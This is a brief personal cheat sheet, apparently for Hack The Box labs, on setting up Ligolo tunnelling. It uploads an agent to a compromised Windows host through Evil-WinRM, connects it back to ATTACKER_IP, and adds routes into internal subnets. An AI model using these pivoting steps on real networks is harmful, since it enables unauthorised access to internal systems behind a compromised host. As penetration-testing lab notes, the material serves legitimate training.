Home

Ligolo

1 min read

Typical setup in HTB scenarios

Victim

*Evil-WinRM* PS C:\Users\asdf\Documents> upload agent.exe
*Evil-WinRM* PS C:\Users\asdf\Documents> .\agent.exe -connect ATTACKER_IP:PORT -ignore-cert -retry

Attacker

$ sudo ./proxy -selfcert -laddr 0.0.0.0:PORT
session
use <SESSION_ID>
ifcreate --name ligolo
 
# Tunnel agent localhost range (127.0.0.1 on pivot host)
route_add --name ligolo --route 240.0.0.0/4
 
# Single internal target
route_add --name ligolo --route 192.168.X.X/32
 
# Multiple internal targets
route_add --name ligolo --route 192.168.X.0/24
 
start --tun ligolo

Graph View